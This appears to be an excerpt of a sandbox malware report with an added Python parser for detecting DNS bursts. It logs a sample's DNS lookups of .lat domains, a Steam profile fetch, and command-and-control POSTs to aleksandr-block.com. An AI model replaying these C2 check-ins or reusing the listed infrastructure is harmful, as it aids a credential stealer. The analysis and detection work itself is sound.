Jan 14, 2025 08:55:44.712485075 CET  49883        443        192.168.2.7     162.125.66.18
Jan 14, 2025 08:55:44.712492943 CET  443          49883      162.125.66.18   192.168.2.7
Jan 14, 2025 08:55:44.950932980 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:44.950948000 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:44.951212883 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:44.953493118 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:44.953507900 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:45.745389938 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:45.745486975 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:45.745496035 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:45.745543003 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:45.747565985 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:45.747571945 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:45.747909069 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:45.749159098 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:45.795326948 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.055651903 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.099340916 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:46.099360943 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.099858999 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:46.099873066 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.099905014 CET  49897        443        192.168.2.7     162.125.66.15
Jan 14, 2025 08:55:46.100090027 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.100127935 CET  443          49897      162.125.66.15   192.168.2.7
Jan 14, 2025 08:55:46.100189924 CET  49897        443        192.168.2.7     162.125.66.15
Timestamp                            Source Port  Dest Port  Source IP       Dest IP
Jan 14, 2025 08:55:29.501594067 CET  53926        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.510795116 CET  53           53926      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.512052059 CET  60418        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.522290945 CET  53           60418      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.525032043 CET  53853        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.534229040 CET  53           53853      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.536919117 CET  50817        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.552645922 CET  53           50817      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.555067062 CET  55020        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.563430071 CET  53           55020      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.565601110 CET  63764        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.574287891 CET  53           63764      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.576397896 CET  57122        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.585757017 CET  53           57122      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.590692997 CET  63949        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.598948956 CET  53           63949      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:29.601252079 CET  55293        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:29.607922077 CET  53           55293      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:31.066282034 CET  62875        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:31.252180099 CET  53           62875      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:43.206079006 CET  60495        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:43.213665962 CET  53           60495      1.1.1.1         192.168.2.7
Jan 14, 2025 08:55:44.916032076 CET  61971        53         192.168.2.7     1.1.1.1
Jan 14, 2025 08:55:44.931713104 CET  53           61971      1.1.1.1         192.168.2.7
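The report export runs the columns of the packet rows above and of the DNS query rows below together, so ports and addresses have no separator. The parser that follows is an added example and is not part of the Joe Sandbox report. A plain backtracking regex gets the split wrong (it returns 53926/5319/2.168.2.7/1.1.1.1 for the first UDP row), so the code enumerates every syntactically valid split of a row and narrows the candidates with three assumptions that are mine, not the page's: the sandbox client is 192.168.2.7 (LOCAL_HOSTS), a packet belongs to a flow already seen in the opposite direction, and one side uses a well-known service port (SERVICE_PORTS). It then groups the DNS lookups into bursts of distinct names within a short window, which is the shape a stealer produces when it walks its embedded C2 list; the threshold values are also mine. The embedded rows are copied from this report, not constructed.

```python
import re
from datetime import datetime

# Added example, not part of the Joe Sandbox report: rebuild the fused
# "Timestamp Source Port Dest Port Source IP Dest IP" rows and the DNS-query rows
# into records, then flag bursts of lookups for distinct names. LOCAL_HOSTS and
# SERVICE_PORTS are assumptions chosen here to break ties; the page shows only rows.
LOCAL_HOSTS = {"192.168.2.7"}
SERVICE_PORTS = {53, 80, 443}
TS_RE = re.compile(r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d{1,9} [A-Z]{3,4})(?P<rest>.*)$")
DNS_RE = re.compile(
    r"^(?P<sip>(?:\d{1,3}\.){3}\d{1,3})(?P<dip>(?:\d{1,3}\.){3}\d{1,3})(?P<txid>0x[0-9a-fA-F]+)"
    r"(?P<op>.+?\(\d+\))(?P<name>\S+?)(?P<qtype>[A-Z]+ \([^)]*\))(?P<qclass>[A-Z]+ \(0x[0-9a-fA-F]+\))"
    r"(?P<doh>true|false)$")

def parse_ts(text):
    """'Jan 14, 2025 08:55:29.501594067 CET' -> naive datetime, truncated to microseconds."""
    body, _tz = text.rsplit(" ", 1)
    head, frac = body.rsplit(".", 1)
    return datetime.strptime(f"{head}.{frac[:6]}", "%b %d, %Y %H:%M:%S.%f")

def _valid_ip(s):
    o = s.split(".")
    return len(o) == 4 and all(x.isdigit() and (x == "0" or x[0] != "0") and int(x) <= 255 for x in o)
def _valid_port(s):
    return s.isdigit() and s[0] != "0" and int(s) <= 65535

def packet_candidates(rest):
    """Every (sport, dport, sip, dip) split of a fused row that is syntactically valid."""
    g = rest.split(".")
    if len(g) != 7:                        # two glued IPv4 addresses carry exactly 6 dots
        return []
    out = []
    for c in range(1, 4):                  # digits in the source IP's first octet
        ports, o1 = g[0][:-c], g[0][-c:]
        for a in range(1, 6):              # digits in the source port
            sport, dport = ports[:a], ports[a:]
            for k in range(1, len(g[3])):  # split of "last sip octet + first dip octet"
                sip = ".".join([o1, g[1], g[2], g[3][:k]])
                dip = ".".join([g[3][k:], g[4], g[5], g[6]])
                if _valid_port(sport) and _valid_port(dport) and _valid_ip(sip) and _valid_ip(dip):
                    out.append((int(sport), int(dport), sip, dip))
    return out

def parse_packet_rows(lines, local_hosts=LOCAL_HOSTS):
    """Resolve rows in order: keep candidates touching the local host, then prefer a flow
    already seen (either direction), then a well-known service port, until one remains."""
    seen, records = set(), []
    for line in lines:
        m = TS_RE.match(line.strip())
        cands = [c for c in packet_candidates(m["rest"]) if c[2] in local_hosts or c[3] in local_hosts]
        for keep in (lambda c: c in seen or (c[1], c[0], c[3], c[2]) in seen,
                     lambda c: c[0] in SERVICE_PORTS or c[1] in SERVICE_PORTS):
            narrowed = [c for c in cands if keep(c)]
            if narrowed:
                cands = narrowed
        if len(cands) != 1:
            raise ValueError(f"ambiguous row {line.strip()!r}: {cands}")
        seen.add(cands[0])
        records.append((parse_ts(m["ts"]),) + cands[0])
    return records

def parse_dns_rows(lines):
    out = []
    for line in lines:
        m = TS_RE.match(line.strip())
        d = DNS_RE.match(m["rest"])
        if d is None:
            raise ValueError(f"unrecognised DNS row {line.strip()!r}")
        out.append({"ts": parse_ts(m["ts"]), **d.groupdict()})
    return out

def query_bursts(queries, window_s=1.0, min_distinct=5):
    """Sorted name lists where >= min_distinct distinct names fall within window_s of the first."""
    qs = sorted(queries, key=lambda q: q["ts"])
    bursts, i = [], 0
    while i < len(qs):
        j = i
        while j + 1 < len(qs) and (qs[j + 1]["ts"] - qs[i]["ts"]).total_seconds() <= window_s:
            j += 1
        names = sorted({q["name"] for q in qs[i:j + 1]})
        if len(names) >= min_distinct:
            bursts.append(names)
            i = j + 1
        else:
            i += 1
    return bursts

# Rows copied verbatim from this report's tables (not constructed), still in fused form.
PACKET_ROWS = [
    "Jan 14, 2025 08:55:29.501594067 CET5392653192.168.2.71.1.1.1",
    "Jan 14, 2025 08:55:29.510795116 CET53539261.1.1.1192.168.2.7",
    "Jan 14, 2025 08:55:40.361150980 CET49860443192.168.2.7188.114.96.3",
    "Jan 14, 2025 08:55:40.361177921 CET44349860188.114.96.3192.168.2.7",
]
DNS_ROWS = [
    "Jan 14, 2025 08:55:29.501594067 CET192.168.2.71.1.1.10x5700Standard query (0)shoefeatthe.latA (IP address)IN (0x0001)false",
    "Jan 14, 2025 08:55:29.512052059 CET192.168.2.71.1.1.10xa7b7Standard query (0)bloodyswif.latA (IP address)IN (0x0001)false",
    "Jan 14, 2025 08:55:29.525032043 CET192.168.2.71.1.1.10x5795Standard query (0)washyceehsu.latA (IP address)IN (0x0001)false",
    "Jan 14, 2025 08:55:29.536919117 CET192.168.2.71.1.1.10x4e2Standard query (0)leggelatez.latA (IP address)IN (0x0001)false",
    "Jan 14, 2025 08:55:29.555067062 CET192.168.2.71.1.1.10x32a5Standard query (0)miniatureyu.latA (IP address)IN (0x0001)false",
    "Jan 14, 2025 08:55:29.565601110 CET192.168.2.71.1.1.10xca1eStandard query (0)kickykiduz.latA (IP address)IN (0x0001)false",
]

if __name__ == "__main__":
    print(*parse_packet_rows(PACKET_ROWS), sep="\n")
    print(query_bursts(parse_dns_rows(DNS_ROWS)))
```

The narrowing order matters: the reply row `53 / 53926 / 1.1.1.1 / 192.168.2.7` also has a valid reading as `53 / 5392 / 61.1.1.1 / 192.168.2.7`, and only the flow seen one row earlier tells them apart, which is why the rows must be fed in the order the report lists them. Any row that still has more than one reading raises instead of guessing, so a wrong tuple never ends up in an IOC list. With the six `.lat` lookups the burst detector reports one group of six distinct names inside 65 ms; a narrower window such as 5 ms reports nothing.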
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 14, 2025 08:55:29.501594067 CET | 192.168.2.7 | 1.1.1.1 | 0x5700 | Standard query (0) | shoefeatthe.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.512052059 CET | 192.168.2.7 | 1.1.1.1 | 0xa7b7 | Standard query (0) | bloodyswif.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.525032043 CET | 192.168.2.7 | 1.1.1.1 | 0x5795 | Standard query (0) | washyceehsu.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.536919117 CET | 192.168.2.7 | 1.1.1.1 | 0x4e2 | Standard query (0) | leggelatez.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.555067062 CET | 192.168.2.7 | 1.1.1.1 | 0x32a5 | Standard query (0) | miniatureyu.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.565601110 CET | 192.168.2.7 | 1.1.1.1 | 0xca1e | Standard query (0) | kickykiduz.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.576397896 CET | 192.168.2.7 | 1.1.1.1 | 0x1dba | Standard query (0) | savorraiykj.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.590692997 CET | 192.168.2.7 | 1.1.1.1 | 0xdac0 | Standard query (0) | finickypwk.lat | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.601252079 CET | 192.168.2.7 | 1.1.1.1 | 0x9665 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:31.066282034 CET | 192.168.2.7 | 1.1.1.1 | 0x1b5f | Standard query (0) | aleksandr-block.com | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:43.206079006 CET | 192.168.2.7 | 1.1.1.1 | 0x7ade | Standard query (0) | www.dropbox.com | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:44.916032076 CET | 192.168.2.7 | 1.1.1.1 | 0xb0a4 | Standard query (0) | ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 14, 2025 08:55:16.872656107 CET | 1.1.1.1 | 192.168.2.7 | 0xd1a7 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 08:55:16.872656107 CET | 1.1.1.1 | 192.168.2.7 | 0xd1a7 | No error (0) | s-part-0017.t-0009.t-msedge.net | | 13.107.246.45 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.510795116 CET | 1.1.1.1 | 192.168.2.7 | 0x5700 | Name error (3) | shoefeatthe.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.522290945 CET | 1.1.1.1 | 192.168.2.7 | 0xa7b7 | Name error (3) | bloodyswif.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.534229040 CET | 1.1.1.1 | 192.168.2.7 | 0x5795 | Name error (3) | washyceehsu.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.552645922 CET | 1.1.1.1 | 192.168.2.7 | 0x4e2 | Name error (3) | leggelatez.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.563430071 CET | 1.1.1.1 | 192.168.2.7 | 0x32a5 | Name error (3) | miniatureyu.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.574287891 CET | 1.1.1.1 | 192.168.2.7 | 0xca1e | Name error (3) | kickykiduz.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.585757017 CET | 1.1.1.1 | 192.168.2.7 | 0x1dba | Name error (3) | savorraiykj.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.598948956 CET | 1.1.1.1 | 192.168.2.7 | 0xdac0 | Name error (3) | finickypwk.lat | none | none | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:29.607922077 CET | 1.1.1.1 | 192.168.2.7 | 0x9665 | No error (0) | steamcommunity.com | | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:31.252180099 CET | 1.1.1.1 | 192.168.2.7 | 0x1b5f | No error (0) | aleksandr-block.com | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:31.252180099 CET | 1.1.1.1 | 192.168.2.7 | 0x1b5f | No error (0) | aleksandr-block.com | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:43.213665962 CET | 1.1.1.1 | 192.168.2.7 | 0x7ade | No error (0) | www.dropbox.com | www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 08:55:43.213665962 CET | 1.1.1.1 | 192.168.2.7 | 0x7ade | No error (0) | www-env.dropbox-dns.com | | 162.125.66.18 | A (IP address) | IN (0x0001) | false
Jan 14, 2025 08:55:44.931713104 CET | 1.1.1.1 | 192.168.2.7 | 0xb0a4 | No error (0) | ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com | edge-block-www-env.dropbox-dns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 14, 2025 08:55:44.931713104 CET | 1.1.1.1 | 192.168.2.7 | 0xb0a4 | No error (0) | edge-block-www-env.dropbox-dns.com | | 162.125.66.15 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• aleksandr-block.com
• www.dropbox.com
• ucc3847efbfdc5176cc975eba0f9.dl.dropboxusercontent.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49784 | 104.102.49.254 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:30 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
    Connection: Keep-Alive
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Host: steamcommunity.com
2025-01-14 07:55:30 UTC | 1905 | IN | HTTP/1.1 200 OK
    Server: nginx
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
    Expires: Mon, 26 Jul 1997 05:00:00 GMT
    Cache-Control: no-cache
    Date: Tue, 14 Jan 2025 07:55:30 GMT
    Content-Length: 35141
    Connection: close
    Set-Cookie: sessionid=207508de5b63d2f8b6c628c5; Path=/; Secure; SameSite=None
    Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2025-01-14 07:55:30 UTC | 14479 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
    Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2025-01-14 07:55:31 UTC | 16384 | IN | Data Raw: 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a
    Data Ascii: eamcommunity.com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">
2025-01-14 07:55:31 UTC | 3768 | IN | Data Raw: 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 61 63 74 69 6f 6e 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 75 6d 6d 61 72 79 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 20 70 65 72 73 6f 6e 61 5f 6e 61 6d 65 5f 73 70 61 63 65 72 22 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 22 3e 0a 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22
    Data Ascii: </a></div><div class="profile_header_actions"></div></div><div class="profile_header_summary"><div class="persona_name persona_name_spacer" style="font-size: 24px;"><span class="
2025-01-14 07:55:31 UTC | 510 | IN | Data Raw: 61 6e 6b 22 3e 53 74 65 61 6d 20 53 75 62 73 63 72 69 62 65 72 20 41 67 72 65 65 6d 65 6e 74 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 26 6e 62 73 70 3b 7c 20 26 6e 62 73 70 3b 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 63 63 6f 75 6e 74 2f 63 6f 6f 6b 69 65 70 72 65 66 65 72 65 6e 63 65 73 2f 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 0a 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 09 09 09 09 09 09 3c 2f 73 70 61 6e 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 6c 69 6e 6b 22
    Data Ascii: ank">Steam Subscriber Agreement</a> &nbsp;| &nbsp;<a href="http://store.steampowered.com/account/cookiepreferences/" target="_blank">Cookies</a></span></span></div><div class="responsive_optin_link"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49795 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:31 UTC | 266 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 8
    Host: aleksandr-block.com
2025-01-14 07:55:31 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
    Data Ascii: act=life
2025-01-14 07:55:32 UTC | 1125 | IN | HTTP/1.1 200 OK
    Date: Tue, 14 Jan 2025 07:55:32 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=9qd915e1jk944hbqif3cjsh2cd; expires=Sat, 10 May 2025 01:42:11 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lU9u7VFaA5Dzk3cXQ4sRDooIJowP3mnH%2F0RBL2HnjzZTdlrydZdyfQxStQd5sj9jDinA385Ex5CjLD1%2BdzSIYovsWFw5ajJvqSeanZ9X9yoIWhB674GSaIYp1o%2FV8potDGo2X5DB"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 901c1073cdf27cfc-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2026&rtt_var=763&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2845&recv_bytes=910&delivery_rate=1432074&cwnd=223&unsent_bytes=0&cid=8e45eb0d83bcec91&ts=454&x=0"
2025-01-14 07:55:32 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
    Data Ascii: 2ok
                                                                                                                                                                                                                                                  2025-01-14 07:55:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 49801 | 188.114.96.3 | 443 | 7532 | C:\Users\user\Desktop\yTRd6nkLWV.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-14 07:55:32 UTC | 267 | OUT | POST /api HTTP/1.1
  Connection: Keep-Alive
  Content-Type: application/x-www-form-urlencoded
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
  Content-Length: 45
  Host: aleksandr-block.com
2025-01-14 07:55:32 UTC | 45 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 62 4c 37 4b 6b 2d 2d 30 34 53 26 6a 3d
  Data Ascii: act=recive_message&ver=4.0&lid=BbL7Kk--04S&j=
2025-01-14 07:55:33 UTC | 1127 | IN | HTTP/1.1 200 OK
  Date: Tue, 14 Jan 2025 07:55:33 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: close
  Set-Cookie: PHPSESSID=p5ak2c113pej3c2sm8615osh94; expires=Sat, 10 May 2025 01:42:11 GMT; Max-Age=9999999; path=/
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate
  Pragma: no-cache
  X-Frame-Options: DENY
  X-Content-Type-Options: nosniff
  X-XSS-Protection: 1; mode=block
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dnvW8EF4rzc%2FIWPNedXNTB%2BYNjXYtPxW%2FT32IKPEkHMoMvFuoDRjSFXjzccY3MfN8C6RnCKma4cnn51A0uW0fGuT2UIMGeg8C16TYT%2B20uPk84immm0KJPWjQ5oEyzRZOtZ88qmx"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 901c1079aeeec477-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=1835&min_rtt=1695&rtt_var=735&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=948&delivery_rate=1722713&cwnd=182&unsent_bytes=0&cid=fc3853ac7c239431&ts=498&x=0"
